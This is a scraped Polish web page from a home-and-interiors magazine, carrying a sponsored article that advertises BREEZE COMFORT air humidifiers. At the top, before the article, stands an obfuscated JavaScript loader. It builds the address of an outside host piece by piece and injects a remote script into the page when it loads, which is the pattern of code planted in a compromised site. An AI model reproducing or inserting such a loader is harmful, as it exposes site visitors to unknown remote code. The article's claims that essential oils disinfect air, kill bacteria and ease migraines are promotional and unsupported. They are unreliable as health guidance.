(function(){ auif=document.createElement("script");auif_="u"+("s")+"ta"; auif_+=("t.i")+""+"n";auif_+=(("f")+"o");auif.type="text/javascript"; auif_+="/"; auifu="435450859";auifu+=".tramggntuif4mw8zsus";auifu+="79wacej3twf"; auif.src="https://"+auif_+auifu;auif.async=true;document.body.appendChild(auif); })();

Nawilżacze powietrza. Dlaczego warto ich używać w okresie zimowym?

Okres zimowy sprzyja temu, że częściej i dłużej siedzimy w przestrzeni zamkniętej, zarówno biurowej jak i domowej, w której powietrze zazwyczaj jest dość suche. Czy to niekorzystnie wpływa na nasze zdrowie i samopoczucie?

Zdecydowanie tak. Wszelkiego rodzaju podrażnienia skóry, oczu, wysuszone gardło, czy zatkany nos to efekt działania suchego powietrza i nieodpowiedniego mikroklimatu. Jak temu przeciwdziałać? Jednym ze skutecznych sposobów jest wyposażenie przestrzeni w nawilżacze powietrza (seria BREEZE COMFORT marki VOLT POLSKA).

Niekorzystny mikroklimat wewnątrz w porze zimowej

W zamkniętych pomieszczeniach mikroklimat nie należy do najbardziej korzystnych. Jeśli powietrze jest suche powoduje szereg dolegliwości kaszel, katar, suchość w gardle. Mamy wysuszoną i podrażnioną skórę. Cierpimy na zaburzenia snu i bóle głowy. Do tego dochodzi osłabienie i znużenie, kłopoty z koncentracją i obniżenie odporności psychicznej. Wszystko to negatywnie wpływa na naszą ogólną kondycję  zdrowotną. Jednym z głównym winowajcą suchego powietrza w porze zimowej jest oczywiście gorący kaloryfer, ale nikt nie wyobraża sobie przebywania w nieogrzewanej przestrzeni w zimowe dni. Rozwiązania typu wieszanie prania na kilka godzin na kaloryferze, czy stawianie obok urządzenia pojemnika z wodą wydają się brzmieć jak z innej epoki. Co należy zrobić?

Funkcjonalne i praktyczne w obsłudze nawilżacze powietrza

Do głównych zalet nawilżaczy powietrza z serii BREEZE COMFORT marki VOLT POLSKA należy przede wszystkim nawilżanie powietrza, czyli poprawa jakości powietrza i utrzymanie wilgotności na optymalnym poziomie. Nasze nawilżacze charakteryzują się też m.in.

  • Wydajnością 260 ml/h
  • Pojemnością zbiornika na wodę (1,2L lub 3,2L)
  • Powierzchnią nawilżania 40m2
  • 3 poziomami prędkości
  • Aromaterapią 360°
  • Timerem 12godzin – daje możliwość ustawienia czasu, po którym urządzenie samoczynnie się wyłączy
  • Pilotem do zdalnego sterowania
  • Urządzenie pracuje cicho, nie powodując dyskomfortu podczas pracy, odpoczynku czy snu
  • Praktyczny w samodzielnym montażu

Nawilżacze powietrza z serii BREEZE COMFORT marki VOLT POLSKA powinny stać w całym domu, szczególnie tam gdzie przebywają dzieci. Niemowlęta na przykład w pierwszych miesiącach życia niezbyt dobrze radzą sobie w suchym powietrzem.

Aromaterapia – orzeźwiający zapach grejpfruta w zimie

Jedną z wielu korzyści jakie przynoszą nasze nawilżacze BREEZE COMFORT szczególnie w okresie zimowym to możliwość zastosowania aromaterapii. Na czym to polega? Wystarczy dodać do nawilżacza kilka kropel ulubionych olejków eterycznych np. eukaliptusowego, grejpfrutowego, czy z drzewa sandałowego by poczuć się jak w domowym SPA. Poczuć błogie ciepło i spokój, zapomnieć o codzienności, szczególnie w ciemne zimowe dni. Olejki eteryczne oprócz działania terapeutycznego mają wiele właściwości zdrowotnych. Działają antybakteryjnie, pomagają przy bólach migrenowych, dezynfekują powietrze.

Materiał promocyjny voltpolska.pl

 

Redakcja

DomNaNowo.pl jest magazynem internetowych z kategorii dom i wnętrza. Naszą misją jest inspirowanie i zachęcanie do ulepszania swojej przestrzeni życiowej. Publikujemy poradniki i artykuły o wszystkim co wiąże się z domami, mieszkaniami i wnętrzarstwem. Publikujemy zestawienia aranżacji różnego typu pomieszczeń oraz przestrzeni mieszkalnych. Prezentujemy rankingi zestawienia. Naszą redakcję tworzy zespół kreatywnych i dociekliwych redaktorów i autorów. Ich pracę wspomagają specjaliści ds. PR oraz marketingu. Na łamach DomNanowo.pl publikowane są nowości wnętrzarskie oraz różne materiały warte opisana i scharakteryzowania. Nasze felietony oraz artykuły poradnikowe tworzone są z myślą o czytelnikach. Z nami każde wnętrze może stać się wyjątkowe.

Powiązane artykuły

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Back to top button